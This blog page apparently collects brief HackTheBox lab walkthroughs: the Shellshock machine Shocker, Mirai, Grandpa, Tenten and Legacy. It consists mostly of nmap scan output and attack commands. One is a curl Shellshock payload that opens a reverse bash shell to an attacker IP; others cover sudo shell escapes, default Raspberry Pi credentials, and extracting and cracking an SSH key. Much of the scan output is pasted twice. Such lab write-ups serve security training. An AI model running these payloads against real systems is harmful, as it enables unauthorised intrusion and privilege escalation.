Commands:
- nmap -A 10.10.10.56
- nc -lnvp 1234
- curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.11/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh
- sudo perl -e 'exec "/bin/sh";'
Showing posts with label Hackthebox. Show all posts
Showing posts with label Hackthebox. Show all posts
Monday, 3 September 2018
Shocker 10.10.10.56 Shellshock Bash Exploit
Saturday, 25 August 2018
Mirai 10.10.10.48 Raspberry Pi HackTheBox
User: pi
Password: raspberry
root@kali:~# ssh pi@10.10.10.48
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Grandpa 10.10.10.14 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.14
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-26 00:19 PKT
Nmap scan report for 10.10.10.14
Host is up (0.13s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /postinfo.html: Frontpage file or folder
| /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
| /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
| /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
| /_vti_bin/shtml.dll: Frontpage file or folder
|_ /_vti_bin/shtml.exe: Frontpage file or folder
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 430.76 seconds
root@kali:~/Desktop/HTB_VIP#
root@kali:~/Desktop/HTB_VIP# nmap -A 10.10.10.14
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-26 00:14 PKT
Nmap scan report for 10.10.10.14
Host is up (0.13s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unkown
| Server Date: Sat, 25 Aug 2018 19:15:18 GMT
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows Server 2008 Enterprise SP2 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2000 SP4 (86%), Microsoft Windows XP (86%), Microsoft Windows Server 2003 SP1 - SP2 (85%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-26 00:19 PKT
Nmap scan report for 10.10.10.14
Host is up (0.13s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /postinfo.html: Frontpage file or folder
| /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
| /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
| /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
| /_vti_bin/shtml.dll: Frontpage file or folder
|_ /_vti_bin/shtml.exe: Frontpage file or folder
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 430.76 seconds
root@kali:~/Desktop/HTB_VIP#
root@kali:~/Desktop/HTB_VIP# nmap -A 10.10.10.14
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-26 00:14 PKT
Nmap scan report for 10.10.10.14
Host is up (0.13s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unkown
| Server Date: Sat, 25 Aug 2018 19:15:18 GMT
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows Server 2008 Enterprise SP2 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2000 SP4 (86%), Microsoft Windows XP (86%), Microsoft Windows Server 2003 SP1 - SP2 (85%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Tenten 10.10.10.10 CV filename disclosure on Job-Manager WP plugin
Commands:
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
python sshng2john.py id_rsa > id_rsa.encrypted
john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
sudo /bin/fuckin su
root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.10
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:52 PKT
Nmap scan report for 10.10.10.10
Host is up (0.13s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.10:80/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-bars
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-close
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/category/uncategorized/
| Form id: search-form-5b8197994e6e2
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-search
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/wp-login.php
| Form id: loginform
| Form action: http://10.10.10.10/wp-login.php
|
| Path: http://10.10.10.10/index.php/jobs/
| Form id:
| Form action: http://10.10.10.10/index.php/jobs/apply/
|
| Path: http://10.10.10.10/#content
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/2017/04/
| Form id: search-form-5b81979f27fb2
|_ Form action: http://10.10.10.10/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-login.php: Wordpress login page.
|_ /readme.html: WordPress version 4.7
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
Nmap done: 1 IP address (1 host up) scanned in 360.64 seconds
root@kali:~/Desktop/HTB_VIP#
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
python sshng2john.py id_rsa > id_rsa.encrypted
john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
sudo /bin/fuckin su
root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.10
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:52 PKT
Nmap scan report for 10.10.10.10
Host is up (0.13s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.10:80/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-bars
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-close
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/category/uncategorized/
| Form id: search-form-5b8197994e6e2
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-search
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/wp-login.php
| Form id: loginform
| Form action: http://10.10.10.10/wp-login.php
|
| Path: http://10.10.10.10/index.php/jobs/
| Form id:
| Form action: http://10.10.10.10/index.php/jobs/apply/
|
| Path: http://10.10.10.10/#content
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/2017/04/
| Form id: search-form-5b81979f27fb2
|_ Form action: http://10.10.10.10/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-login.php: Wordpress login page.
|_ /readme.html: WordPress version 4.7
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
Nmap done: 1 IP address (1 host up) scanned in 360.64 seconds
root@kali:~/Desktop/HTB_VIP#
wpscan -u 10.10.10.10 -f -e -r
Legacy 10.10.10.4 MS08-067 Microsoft Server Service Relative Path Stack Corruption
root@kali:~/Desktop/HTB_VIP/Legacy# nmap -script=vuln 10.10.10.4
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:37 PKT
Nmap scan report for 10.10.10.4
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 49.79 seconds
root@kali:~/Desktop/HTB_VIP/Legacy#
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:37 PKT
Nmap scan report for 10.10.10.4
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 49.79 seconds
root@kali:~/Desktop/HTB_VIP/Legacy#
Subscribe to:
Posts (Atom)